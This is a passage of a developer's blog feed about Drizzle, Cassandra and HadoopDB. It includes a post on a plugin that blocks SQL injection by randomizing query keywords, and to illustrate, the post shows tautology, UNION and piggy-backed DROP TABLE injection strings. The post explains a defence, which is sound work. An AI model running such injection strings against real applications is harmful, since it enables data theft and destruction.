---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20110201.1'.
Last login: Mon Apr 11 22:27:04 2011 from 12.43.172.10
ubuntu@ip-10-116-210-131:~$ drizzle
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 9
Connection protocol: mysql
Server version: 2011.03.13 Ubuntu

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; 
&lt;/pre&gt;

&lt;h2&gt;Conclusion&lt;/h2&gt;

&lt;p&gt;
Hopefully, this tutorial proves useful. I hope to work more on the Drizzle cookbook in the near future and add support for the various plugin types present in Drizzle.
&lt;/p&gt;
</content>
 </entry>
 
 <entry>
   <title>Secondary Indexes with libcassandra in C++</title>
   <link href="http://posulliv.github.com/2011/02/27/libcassandra-sec-indexes"/>
   <updated>2011-02-27T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2011/02/27/libcassandra-sec-indexes</id>
   <content type="html">&lt;p&gt;
Last weekend I updated my high-level C++ client for Cassandra, &lt;a href=&quot;https://github.com/posulliv/libcassandra/&quot;&gt;libcassandra&lt;/a&gt; to support a lot of the new features in the 0.7 Cassandra release. In particular, one of the new features is secondary indexes and I wanted to very briefly outline how secondary indexes can be used programatically in libcassandra.
&lt;/p&gt;

&lt;p&gt;
An &lt;a href=&quot;http://www.datastax.com/dev/blog/whats-new-cassandra-07-secondary-indexes&quot;&gt;article&lt;/a&gt; by Datastax gives a great overview of secondary indexes. I'm going to use the example in that article here.
&lt;/p&gt;

&lt;p&gt;
The first thing which we must do is create a keyspace and column family. This is accomplished in libcassandra like:
&lt;/p&gt;

&lt;script src=&quot;https://gist.github.com/846780.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
After creating a keyspace and column family for working with, we next want to insert some sample data. I'll use the sample data inserted in the article but instead of inserting it through the CLI, I'll insert it using libcassandra:
&lt;/p&gt;

&lt;script src=&quot;https://gist.github.com/846777.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
Next, to perform the same query as was used in the article, the code looks like:
&lt;/p&gt;

&lt;script src=&quot;https://gist.github.com/846782.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
Currently, the result set is a &lt;code&gt;std::map&lt;/code&gt; of row keys to an inner &lt;code&gt;std::map&lt;/code&gt; of column names to column values. I plan on adding support for the result to contain more information about each row in the result set in the future.
&lt;/p&gt;

</content>
 </entry>
 
 <entry>
   <title>SQL Injection Prevention in Drizzle</title>
   <link href="http://posulliv.github.com/2010/12/05/stad-plugin"/>
   <updated>2010-12-05T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/12/05/stad-plugin</id>
   <content type="html">&lt;p&gt;
SQL injection attacks occur frequently nowadays. While attacks of this nature are completely avoidable when safe programming techniques are used, they still occur in practice. 
&lt;/p&gt;

&lt;p&gt;
With this in mind, I developed a plugin for Drizzle named STAD that utilizes the &lt;a href=&quot;http://posulliv.github.com/2010/03/01/query-rewrite.html&quot;&gt;query rewriting plugin interface&lt;/a&gt; to prevent SQL injection attacks. The target use case for this plugin is a hosted environment where applications being developed are independent of the database layer i.e. a DBA can not control how a developer chooses to develop their application. Also, I mainly did this as a side-project to demonstrate a use-case for the query rewriting API.
&lt;/p&gt;

&lt;h2&gt;Overview&lt;/h2&gt;

&lt;p&gt;
STAD is a practical protection mechanism that applies the concept of instruction-set randomization to SQL: the SQL standard keywords are modified by appending a random key to them, one that an attacker cannot easily guess. Queries injected by an attacker into a randomized query will be caught since they will not contain the randomization key. The plugin will then just execute a harmless query (for now it is 'SELECT 1') instead of returning any error information to a potential attacker. The security of this approach is dependent on attackers not being able to discover the randomization key. If the key is exposed to an attacker, they will have the ability to inject SQL with the appropriate key appended to keywords.
&lt;/p&gt;

&lt;p&gt;
This solution was first developed in the research paper &lt;a href=&quot;http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.10.4549&quot;&gt;'SQLrand: Preventing SQL Injection Attacks'&lt;/a&gt;. In their implementation of the idea, a proxy was developed that sat between the application and the database server. Thus, while it was a database independent solution, the overhead of the proxy layer and the introduction of a new component made it impractical.
&lt;/p&gt;

&lt;p&gt;
In drizzle, this funtionality is enabled through the query rewriting API. When the plugin is loaded and a randomization key is specified, all queries issued against the database must contain the correct randomization key or they will not execute correctly. A version of the drizzle command line client comes with the plugin that automatically appends the correct randomization key to SQL keywords. When the plugin is loaded and a randomization key is specified, an administrator is encouraged to use this version of the drizzle command line client.
&lt;/p&gt;

&lt;p&gt;
To get an idea of how the plugin works, I created a simple diagram to illustrate the steps involved in executing a query when the plugin is enabled. 
&lt;/p&gt;

&lt;img src=&quot;../../../images/stad_arch.jpg&quot; width=750 /&gt;

&lt;p&gt;
In step (1) in the diagram above, a client driver (in this case ruby which I will link to later) establishes a connection with the server and asks the STAD plugin for the current randomization key. In step (2), this key is returned to the driver (right now it is transferred as plaintext) and stored there for the duration of the connection.
&lt;/p&gt;

&lt;p&gt;
In step (3), an application issues a query which goes through a client driver. This client driver randomizes the query using the randomization key obtained from the STAD plugin in step (2). It is this randomized query that is submitted to the server in step (4). Step (5) occurs before the query is parsed by the drizzle kernel. The STAD plugin de-randomizes the query and if all SQL keywords were randomized with the correct randomization key, it passes the correct query onto the drizzle query execution engine in step (6).
&lt;/p&gt;

&lt;p&gt;
Steps (7) and (8) are simply the returning of a result set to the client driver and application sitting above it.
&lt;/p&gt;

&lt;h2&gt;Attack Examples&lt;/h2&gt;

&lt;p&gt;
In the survey paper &lt;a href=&quot;http://www-rcf.usc.edu/~halfond/papers/halfond06issse.pdf&quot;&gt;'A Classification of SQL Injection Attacks and Countermeasures'&lt;/a&gt;, the authors described a number of SQL injection attack types. I'm going to go through a few of these attack types and the examples from the paper and how the STAD plugin can prevent them. For the attack types and examples that go along with them, it assumed that the application is badly written and dynmically builds a SQL query based on user input without any validation of the input data. The query that will be constructed is:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login='name' AND pass='pass' AND pin=pinno
&lt;/pre&gt;

&lt;p&gt;
The login, pass, and pin conditions in the WHERE clause are obtained from user input.
&lt;/p&gt;

&lt;h3&gt;Tautologies&lt;/h3&gt;

&lt;p&gt;
The general goal of a tautology-based attack is to inject code in one or more conditional statements so that they always evaluate to true. The consequences of this attack depend on how the results of the query are used within the application.
&lt;/p&gt;

&lt;p&gt;
This attack type has three main goals:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;bypass authentication&lt;/li&gt;
  &lt;li&gt;identify injectable parameters&lt;/li&gt;
  &lt;li&gt;extract data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
An example of this attack would be:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login='' OR 1=1 -- AND pass='' AND pin=
&lt;/pre&gt;

&lt;p&gt;
In this example, an attacker has injected a conditional (OR 1=1) that transforms the entire WHERE clause into a tautology and so every row in the users table will be returned.
&lt;/p&gt;

&lt;p&gt;
This attack would be prevented using our approach. Assume for a moment that the randomization key is the string '1234'. In this case, the query issued to the drizzle server would look like:
&lt;/p&gt;

&lt;pre&gt;
SELECT1234 accounts FROM1234 users WHERE1234 login='' OR 1=1 -- AND1234 pass='' AND1234 pin=
&lt;/pre&gt;

&lt;p&gt;
In this case, the query would not be de-randomized correctly. The STAD plugin would see that the OR keyword has not been randomized with the correct randomization key. Thus, the plugin would detect spurious input and never issue this query against the database.
&lt;/p&gt;

&lt;h3&gt;UNION Query&lt;/h3&gt;

&lt;p&gt;
In union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query.
&lt;/p&gt;

&lt;p&gt;
The goals of this attack type are:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;bypass authentication&lt;/li&gt;
  &lt;li&gt;extract data&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
With this attack, an attacker can trick the application into returning data from a table different than the one intended by the developer. 
&lt;/p&gt;

&lt;p&gt;
For example, assume there is another table named creditcards in the same schema as the users table. In that case, an attacker could construct a query like:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND pass = '' AND pin=
&lt;/pre&gt;

&lt;p&gt;
The original query returns an empty set but the second query returns data from the creditcards table if the given account number exists. The result of this depends on the application but it is possible an attacker could exploit this.
&lt;/p&gt;

&lt;p&gt;
With our plugin, this query would look like:
&lt;/p&gt;

&lt;pre&gt;
SELECT1234 accounts FROM1234 users WHERE1234 login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND1234 pass = '' AND1234 pin=
&lt;/pre&gt;

&lt;p&gt;
As in the tautology attack, this query would never be issued since not all keywords in the query have been randomized with the correct randomization key.
&lt;/p&gt;

&lt;h3&gt;Piggy-Backed Queries&lt;/h3&gt;

&lt;p&gt;
Here, an attacker attempts to inject additional queries into the original query. In this case, an attacker is not trying to modify the original query; instead they are attempting to include new and distinct queries that &quot;piggy-back&quot; on the original query (think &lt;a href=&quot;http://xkcd.com/327/&quot;&gt;little-bobby tables&lt;/a&gt;).
&lt;/p&gt;

&lt;p&gt;
The goals of this attack type are:
&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;extract data&lt;/li&gt;
  &lt;li&gt;add or modify data&lt;/li&gt;
  &lt;li&gt;perform denial of service&lt;/li&gt;
  &lt;li&gt;execute remote commands&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;
The database will receive multiple queries when an attack of this type is launched. If successful, an attacker could insert virtually any type of SQL command into the additional queries issued after the original query.
&lt;/p&gt;

&lt;p&gt;
An example of this attack would be:
&lt;/p&gt;

&lt;pre&gt;
SELECT accounts FROM users WHERE login = 'bob' AND pass = ''; DROP TABLE users; -- ' AND pin = 1941;
&lt;/pre&gt;

&lt;p&gt;
The above attack has the DROP TABLE statement piggy-backed onto the original query. It would drop the users table. Our approach would prevent this plugin a similar way to the previous 2 attack types. The injectde commands would not have been radomized with the correct randomization key and so would be rejected by our plugin. In this case, the first query would be issued but the DROP TABLE statement would never be executed.
&lt;/p&gt;

&lt;h2&gt;Overheads of Our Approach&lt;/h2&gt;

&lt;p&gt;
One question that pops up when using a plugin like this would be what kind of overheads are associated with it. One experiment I performed to measure the overhead of the plugin was to use the oltp test in sysbench at various concurrency levels with the plugin both enabled and disabled. The results for this experiment are shown below:
&lt;/p&gt;

&lt;img src=&quot;../../../images/sysbench_raw_numbers.png&quot; /&gt;

&lt;p&gt;
Its worth noting that this experiment was run on my local laptop so the actual transaction per second numbers are not interesting. All I'm looking to see is what kind of dip in transactions per second I see when the plugin is enabled. We can see that there is definitely a hit taken when the plugin is enabled with the reduction in transactions per second being about 10% across the board.
&lt;/p&gt;

&lt;h2&gt;Installation and Usage&lt;/h2&gt;

&lt;p&gt;
The &lt;a href=&quot;http://github.com/posulliv/stad&quot;&gt;STAD plugin&lt;/a&gt; is maintained on github as a purely out-of-tree drizzle plugin. To download the source, either git or wget can be used:
&lt;/p&gt;

&lt;pre&gt;
wget https://github.com/posulliv/stad/tarball/master
git clone git://github.com/posulliv/stad.git
&lt;/pre&gt;

&lt;p&gt;
To build and install the plugin, the following is performed:
&lt;/p&gt;

&lt;pre&gt;
./config/autorun.sh
./configure --includedir=/path/to/drizzle/root/include --with-libdrizzle-prefix=/path/to/drizzle/root --prefix=/path/to/drizzle/root
make
make install
&lt;/pre&gt;

&lt;p&gt;
The above assumes you have drizzle installed somewhere on your system. You just need to point the configure script to that location so it can find the header files it needs.
&lt;/p&gt;

&lt;p&gt;
When starting the drizzled daemon, we need to inform it about the new plugin that we want to load since the plugin is not loaded by default. The extra parameter to pass to drizzled is --plugin-add (this loads the default list of plugins in addition to any plugins given as a parameter) so my drizzled command in my startup script looks like:
&lt;/p&gt;

&lt;pre&gt;
start_daemon -p &quot;$PIDFILE&quot; &quot;$DAEMON --chuid $DRIZZLE_USER&quot;  &quot;--datadir=$DATADIR&quot; &quot;--plugin-add=stad&quot;&gt; $LOG 2&gt;&amp;1 &amp;
&lt;/pre&gt;

&lt;p&gt;
To verify the plugin is loaded correctly, we can query the MODULES table in the DATA_DICTIONARY schema:
&lt;/p&gt;

&lt;pre&gt;
drizzle&gt; select module_author, module_license, module_version
    -&gt; from data_dictionary.modules
    -&gt; where module_name = 'stad';
+----------------------+----------------+----------------+
| module_author        | module_license | module_version |
+----------------------+----------------+----------------+
| &quot;Padraig O Sullivan&quot; | GPL            | &quot;0.2&quot;          | 
+----------------------+----------------+----------------+
1 row in set (0 sec)

drizzle&gt; 
&lt;/pre&gt;

&lt;p&gt;
Once the plugin is installed, we can use a ruby client for drizzle I've been working with in my spare time. This &lt;a href=&quot;http://github.com/posulliv/drizzle-ruby&quot;&gt;ruby client&lt;/a&gt; is on github as well and it can either be retrieved using git or a tarball can be pulled:
&lt;/p&gt;

&lt;pre&gt;
wget https://github.com/posulliv/drizzle-ruby/tarball/master
git clone git://github.com/posulliv/drizzle-ruby.git
&lt;/pre&gt;

&lt;p&gt;
Then to install the client, its simply:
&lt;/p&gt;

&lt;pre&gt;
sudo rake install
&lt;/pre&gt;

&lt;p&gt;
Once the ruby client is installed, we can begin to use it in an application. A simple example of using it is:
&lt;/p&gt;

&lt;script src=&quot;http://gist.github.com/717571.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
The above does nothing interesting but highlights a few interesting points. The client decides whether or not to use SQL randomization for a query based on the connection options given when creating a new connection to the database. Creating the connection object in the example above corresponds directly to steps (1) and (2) in the overview diagram we gave at the beginning of this article. 
&lt;/p&gt;

&lt;p&gt;
To issue a query that will be randomized, we must first specify a randomization key to the STAD plugin. Right now, this is done using a global variable so anyone who can connect to your drizzle database and view global variables can see what randomization key is being used. To set the randomization key to '1234', its simply:
&lt;/p&gt;

&lt;pre&gt;
drizzle&gt; set global stad_key = '1234';
Query OK, 0 rows affected (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;p&gt;
After setting the randomization key, every query that issued against the database will now need to be randomized. This obviously becomes a problem if you need to issue queries through the command line client! The solution I use for now is to provide a version of the drizzle CLI named stadclient that takes the randomization key as a parameter. This binary will be installed in the bin directory under your drizzle root when you install the STAD plugin. We invoke it and can issue regular queries again through the CLI:
&lt;/p&gt;

&lt;pre&gt;
$ stadclient -k 1234

drizzle&gt; select * from data_dictionary.global_variables where variable_name = 'stad_key'; 
+---------------+----------------+
| VARIABLE_NAME | VARIABLE_VALUE |
+---------------+----------------+
| stad_key      | 1234           | 
+---------------+----------------+
1 row in set (0 sec)

drizzle&gt;
&lt;/pre&gt;

&lt;p&gt;
Getting back to the ruby client, queries are issued against drizzle and randomized automatically by the ruby client. The code to issue a query against the server is:
&lt;/p&gt;

&lt;script src=&quot;http://gist.github.com/727914.js&quot;&gt;&lt;/script&gt;

&lt;p&gt;
Line 11 in the above code encapsulates steps (3) through (7) in the overview diagram at the beginning of this article. Line 12 actually returns the results to the application and corresponds to step (8) in the diagram.
&lt;/p&gt;

&lt;h2&gt;Conclusions&lt;/h2&gt;

&lt;p&gt;
STAD is a practical protection mechanism against SQL injection attacks. It has relatively low overheads and when used through the ruby client interface I developed, it becomes quite simple to use in a client application with minimal modification. Of course, SQL injection attacks are completely preventable using good programming practices but I believe this plugin provides an extra layer of security in environments where a DBA cannot control how a developer chooses to sanitize their input.
&lt;/p&gt;
</content>
 </entry>
 
 <entry>
   <title>Drupal 7 with Drizzle</title>
   <link href="http://posulliv.github.com/2010/07/12/drizzle-drupal"/>
   <updated>2010-07-12T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/07/12/drizzle-drupal</id>
   <content type="html">I wrote an &lt;a href=&quot;http://akiban.com/blog/2010/07/12/running-drupal-7-with-drizzle/&quot;&gt;article&lt;/a&gt; on the company
blog today about how to configure the latest Drupal 7 alpha release to work with Drizzle as the backend database.
&lt;br&gt;&lt;br&gt;

Feel free to check it out if you are interested.

</content>
 </entry>
 
 <entry>
   <title>Simple Drizzle Replication Plugin for Cassandra</title>
   <link href="http://posulliv.github.com/2010/06/01/replication-plugins"/>
   <updated>2010-06-01T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/06/01/replication-plugins</id>
   <content type="html">This week, I'm giving a talk at &lt;a href=&quot;http://opensourcebridge.org&quot;&gt;Open Source Bridge&lt;/a&gt; in Portland on 
developing replication plugins for Drizzle. This talk will be based on the &lt;a href=&quot;&quot;&gt;tutorial&lt;/a&gt; that
&lt;a href=&quot;http://joinfu.com&quot;&gt;Jay&lt;/a&gt; and I gave at the MySQL User's Conference this year. What I want to
cover in this article is the process of creating a simple replication plugin that simply applies the 
replication events that occur in Drizzle to &lt;a href=&quot;http://cassandra.apache.org/&quot;&gt;Cassandra&lt;/a&gt;.
&lt;br&gt;

Lots of the material in this article is directly due to input from Jay and in particular from
the &lt;a href=&quot;http://joinfu.com/presentations/drizzle-replication-plugins/drizzle-replication-plugins.pdf/&quot;&gt;presentation&lt;/a&gt; 
Jay put together for our tutorial in April.
&lt;br&gt;

&lt;h2&gt;Drizzle Architecture &amp; Replication Basics&lt;/h2&gt;

As is pretty well known at this stage, Drizzle follows a micro-kernel design. Essentially, this means that
most features are built as plugins. For example, in Drizzle, authentication, logging, storage engines, etc.
are provided as plugins. The kernel is meant to be extremely small in size and provides the basic 
functionality a database server requires such as a parser, query optimizer, and query executor.
&lt;br&gt;

Replication in Drizzle is entirely row-based with the kernel being the marshall of all sources and targets of 
replicated data. The kernel constructs objects that represent changes made in the server. The objects 
constructed are of type &lt;code&gt;message::Transaction&lt;/code&gt; and the kernel pushes these constructed objects
out to replication streams (a replication stream in Drizzle is a pairing of a replicator and an
applier).
&lt;br&gt;

The Transaction message in Drizzle is the basic unit of work in the replication system which represents a
set of changes that were made. We use &lt;a href=&quot;http://code.google.com/p/protobuf/&quot;&gt;Google Protocol
Buffers&lt;/a&gt; for representing these messages. The GPB definition for the Transaction message is contained
within the &lt;code&gt;drizzled/message/transaction.proto&lt;/code&gt; file within the Drizzle source tree. Jay has
&lt;a href=&quot;http://www.joinfu.com/2009/10/drizzle-replication-changes-in-api-to-support-group-commit/&quot;&gt;
previously&lt;/a&gt; gone into great detail on the GPB message definitions and I see no point in duplicating the
great articles Jay has written so I encourage you to read those if you are interested in knowing more about
the GPB message definitions.

&lt;h2&gt;Creating a Simple Cassandra Applier&lt;/h2&gt;

Mainly, what I wanted to do in this article is to go through a simple example to demonstrate the replication
API. Please note that the plugin I'm going to cover for this example is extremely simple and probably
not very useful. Its main purpose is to serve as an example of how to develop a transaction applier plugin
that can apply transactions to a difference database system; in this case Cassandra.
&lt;br&gt;

Our Cassandra applier depends on 2 third-party libraries: 1) &lt;a href=&quot;http://incubator.apache.org/thrift&quot;&gt;
thrift&lt;/a&gt; and 2)&lt;a href=&quot;http://github.com/posulliv/libcassandra&quot;&gt;libcassandra&lt;/a&gt;. libcassandra is
a C++ wrapper for the thrift interface to Cassandra that I developed a few months ago to make it easier
for me to play with Cassandra when programming in C++. Its not very well tested but suits my purposes just
fine. 
&lt;br&gt;

Given that our plugin depends on some third-party libraries, my &lt;code&gt;plugin.ini&lt;/code&gt; file will look like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420592.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

And my &lt;code&gt;plugin.ac&lt;/code&gt; file will look like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420594.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

This takes care of my plugin's dependence on third-party libraries during the compilation process. If these
libraries are not present on the system when I compile Drizzle, then this plugin will not be compiled. 
&lt;br&gt;

As mentioned before, the plugin I am developing is a transaction applier. This means the plugin will be
implementing the &lt;code&gt;plugin::TransactionApplier&lt;/code&gt; interface. The main function a plugin implementing
this interface needs to implement is the apply function:

The header file for the CassandraApplier class is defined in a new header file named &lt;code&gt;cassandra_applier.h&lt;/code&gt;
which contains the class declaration that looks like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420596.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

The implementation is contained within the &lt;code&gt;cassandra_applier.cc&lt;/code&gt; C++ file. The most interesting function in
this file is the plugin's implementation of the &lt;code&gt;apply()&lt;/code&gt; function. In the case of the 
CassandraApplier, this function looks like:

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420597.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

One thing worth mentioned about the above function before delving into its details is that we assume
that there is 1 keyspace within Cassandra that we will replicating into. If this keyspace, is not present,
the function will fail. This is mainly because this allowed me to develop this plugin pretty quickly. There
is really no other reason for that. In reality, a more robust plugin would allow the keyspace to be 
configurable. Personally, I would prefer to have a way to specify the keyspace a statement should be 
replicated into specified in the SQL statement so it could be controlled on a per-statement basis. Not a 
major issue but I wanted to point this out in case anyone was wondering.
&lt;br&gt;

Now, the above function first looks at the Transaction message and determines how many Statement messages
are contained within it. Next, we loop through all the Statement messages contained within the Transaction
message. Depending on the type of the Statement message, we perform a different action. Right now, the 
plugin only cares about 3 types of Statements: INSERT, UPDATE, and DELETE.
&lt;br&gt;

However, the action performed for each action is virtualy identical. First the header for that type is
obtained. Next, the table metadata and actual data for the Statement is obtained. We then loop through
each field affected by this Statement. 
&lt;br&gt;

For example, with an INSERT Statement, we loop through each
field affected by the INSERT and obtain the field metadata for that field. We use this to obtain the key
that will be used for insertion in Cassandra. For this simple plugin, the key used by Cassandra is the
primary key of a table. The name of the field is used as a column name in Cassnadra and the value being
inserted for that field is used as the value for that column. The name of the table on which the INSERT
is happening corresponds to a column family name in Cassandra.
&lt;br&gt;

The initialization function for this plugin is pretty straightforward. We allocate memory for a 
CassandraApplier object and add that object the plugin registry:

All the above files I referenced are placed in a directory named cassandra_applier I created in the plugin
directory in the &lt;code&gt;lp:~posulliv/drizzle/rep-cassandra&lt;/code&gt; branch on &lt;a href=&quot;http://launchpad.net/drzzle&quot;&gt;
Launchpad&lt;/a&gt;. To download and compile the plugin, perform the following:

&lt;pre&gt;
bzr branch lp:~posulliv/drizzle/rep-cassandra
cd rep-cassandra
export CXXFLAGS=-I/usr/local/include/thrift
./config/autorun.sh
./configure --with-cassandra-applier-plugin
make
&lt;/pre&gt;

If any of the third-part libraries required by the plugin are absent, you will see a message informing you
of that during the configure stage.
&lt;br&gt;

In order to start a Drizzle server from the above branch with the appropriate plugins loaded, I perform
the following:

&lt;pre&gt;
mkdir run
cd run
../drizzled/drizzled --basedir=$PWD \
--datadir=$PWD \
--plugin_add=default_replicator,cassandra_applier \
&gt;&gt; $PWD/drizzle.err 2&gt;&amp;1
&lt;/pre&gt;

To make sure the correct replication stream is enbabled within Drizzle, I can query the data dictionary 
table Jay created for this purpose:

&lt;pre&gt;
drizzle&gt; select * from data_dictionary.replication_streams;
+--------------------+-------------------+
| REPLICATOR         | APPLIER           |
+--------------------+-------------------+
| default_replicator | cassandra_applier | 
+--------------------+-------------------+
1 row in set (0 sec)

drizzle&gt; 
&lt;/pre&gt;

Next I'll start up my Cassandra cluster that the applier plugin will work with.

For reference, I'm using Cassandra 0.7 and the Cassandra cluster I used for this article is configured as follows (the 
&lt;code&gt;cassandra.yaml&lt;/code&gt; file):

&lt;br&gt;
&lt;script src=&quot;http://gist.github.com/420601.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

Now, to see the plugin in action, consider the following table in Drizzle:

&lt;pre&gt;
drizzle&gt; create table padraig
    -&gt; (
    -&gt;   a int,
    -&gt;   b varchar(128),
    -&gt;   c varchar(128),
    -&gt;   primary key(a)
    -&gt; );
Query OK, 0 rows affected (0.07 sec)

drizzle&gt; 
&lt;/pre&gt;

And assume we perform the following INSERT statements on the table:

&lt;pre&gt;
drizzle&gt; insert into padraig (a, b) values (1, 'sarah');
Query OK, 1 row affected (0.16 sec)

drizzle&gt; insert into padraig (a, c) values (2, 'nimbus');
Query OK, 1 row affected (0.15 sec)

drizzle&gt; insert into padraig (a, b, c) values (3, 'domhnall', 'tomas');
Query OK, 1 row affected (0.15 sec)

drizzle&gt; 
&lt;/pre&gt;

Now, to see what was inserted in Cassandra, we will use the Cassandra CLI interface:

&lt;pre&gt;
$ ./bin/cassandra-cli 
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
[default@unknown] connect localhost/9160
Connected to: &quot;Drizzle Example Cluster&quot; on localhost/9160
[default@unknown] use drizzle;
Authenticated to keyspace: drizzle
[default@drizzle] get padraig['1']
=&gt; (column=61, value=sarah, timestamp=1275376031524000)
Returned 1 results.
[default@drizzle] get padraig['2'] 
=&gt; (column=62, value=nimbus, timestamp=1275376057537000)
Returned 1 results.
[default@drizzle] get padraig['3']                  
=&gt; (column=62, value=domhnall, timestamp=1275376211981000)
=&gt; (column=61, value=tomas, timestamp=1275376067097000)
Returned 2 results.
[default@drizzle] quit
$
&lt;/pre&gt;

&lt;br&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;

That's about it for this article on Drizzle replication. If interested in more, feel free to ping the Drizzle
mailing list with questions or comments. Parts of replication are still under active development and I know
Jay loves to get feedback from people on the replication API in Drizzle.
</content>
 </entry>
 
 <entry>
   <title>Up and Running with HadoopDB</title>
   <link href="http://posulliv.github.com/2010/05/10/hadoopdb-mysql"/>
   <updated>2010-05-10T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/05/10/hadoopdb-mysql</id>
   <content type="html">&lt;a href=&quot;http://db.cs.yale.edu/hadoopdb/hadoopdb.html&quot;&gt;HadoopDB&lt;/a&gt; is an interesting project going
on at Yale under the &lt;a href=&quot;http://dbmsmusings.blogspot.com/&quot;&gt;Prof. Daniel Abadi's&lt;/a&gt; supervision
that I've been meaning to play with for some time now. I initially read the &lt;a
href=&quot;http://db.cs.yale.edu/hadoopdb/hadoopdb.pdf&quot;&gt;paper&lt;/a&gt; describing HadoopDB last year and
intended to document how to setup a HadoopDB system using MySQL but I got busy with school work and
never got around to it. Since I have a little more free time now that I've finished my thesis, I
figured it was about time I got down to playing around with HadoopDB and describing how to setup a
HadoopDB system using MySQL as the single node database. With that, I'm going to describe how to get
up and running with HadoopDB. If you have not read the paper before starting, I strongly encourage
you to give it a read. Its very well written and not that difficult to get through.
&lt;br&gt;

In this guide, I'm installing on Ubuntu Server 10.04 64-bit. Thus, I will be using the Ubuntu
package manager heavily. I have not tested on other platforms but a lot of what is described here
should apply to other platforms such as CentOS.
&lt;br&gt;

This guide is only on how to set up a single node system. It would not be difficult to extend what
is contained here for setting up a multi-node system which I may write about in the future.

&lt;h2&gt;Installing Hadoop&lt;/h2&gt;

Before installing Hadoop, Java needs to be installed. As of 10.04, the Sun JDK packages have been
&lt;a
href=&quot;http://www.ubuntu.com/getubuntu/releasenotes/1004#Sun%20Java%20moved%20to%20the%20Partner%20repository&quot;&gt;dropped&lt;/a&gt; from the Multiverse section of the Ubuntu archive. You can still install the Sun JDK if you
wish but for this article, I used OpenJDK without issues:

&lt;pre&gt;
sudo apt-get install openjdk-6-jdk
&lt;/pre&gt;

Before getting into the installation of Hadoop, I encourage you to read Michael Noll's in-depth
&lt;a
href=&quot;http://www.michael-noll.com/wiki/Running_Hadoop_On_Ubuntu_Linux_(Single-Node_Cluster)&quot;&gt;guide&lt;/a&gt;
to installing Hadoop on Ubuntu. I borrow from his articles a lot here.
&lt;br&gt;

First, create a user account and group that Hadoop will run as:

&lt;pre&gt;
sudo groupadd hadoop
sudo useradd -m -g hadoop -d /home/hadoop -s /bin/bash -c &quot;Hadoop software owner&quot; hadoop
&lt;/pre&gt;

Next, we &lt;a href=&quot;http://www.apache.org/dyn/closer.cgi/hadoop/core&quot;&gt;download&lt;/a&gt; Hadoop and create
directories for storing the software and data. For this article, Hadoop 0.20.2 was used:

&lt;pre&gt;
cd /opt
sudo wget http://www.gtlib.gatech.edu/pub/apache/hadoop/core/hadoop-0.20.2/hadoop-0.20.2.tar.gz
sudo tar zxvf hadoop-0.20.2.tar.gz
sudo ln -s /opt/hadoop-0.20.2 /opt/hadoop
sudo chown -R hadoop:hadoop /opt/hadoop /opt/hadoop-0.20.2
sudo mkdir -p /opt/hadoop-data/tmp-base
sudo chown -R hadoop:hadoop /opt/hadoop-data/
&lt;/pre&gt;

Alternatively, Cloudera has created &lt;a href=&quot;http://www.cloudera.com/hadoop-deb&quot;&gt;Deb packages&lt;/a&gt;
that can be used if you wish. I have not used them before so can't comment on how they work.
&lt;br&gt;

Next, we need to configure SSH for the hadoop user. This is required by Hadoop in order to manage
any nodes.

&lt;pre&gt;
su - hadoop
ssh-keygen -t rsa
cat $HOME/.ssh/id_rsa.pub &gt;&gt; $HOME/.ssh/authorized_keys
&lt;/pre&gt;

When the ssh-keygen command is run, be sure to leave the passphrase as blank so that you will not be
prompted for a password.
&lt;br&gt;

We will want to update the .bashrc file for the hadoop user with appropriate environment variables
to make administration easier:
&lt;script src=&quot;http://gist.github.com/394768.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;

We will cover installing Hive later in this article but for now, leave that environment variable in
there. For the remainder of this article, I will be referring to various locations such as the
Hadoop installation directory using the environment variables defined above.

Next, we want configure Hadoop. There are 3 configuration files in Hadoop that we need to modify:

&lt;ul&gt;
  &lt;li&gt;$HADOOP_CONF/core-site.xml&lt;/li&gt;
  &lt;li&gt;$HADOOP_CONF/mapred-site.xml&lt;/li&gt;
  &lt;li&gt;$HADOOP_CONF/hdfs-site.xml&lt;/li&gt;
&lt;/ul&gt;

Based on the directory structure I created beforehand, these 3 files looked as follows for me:

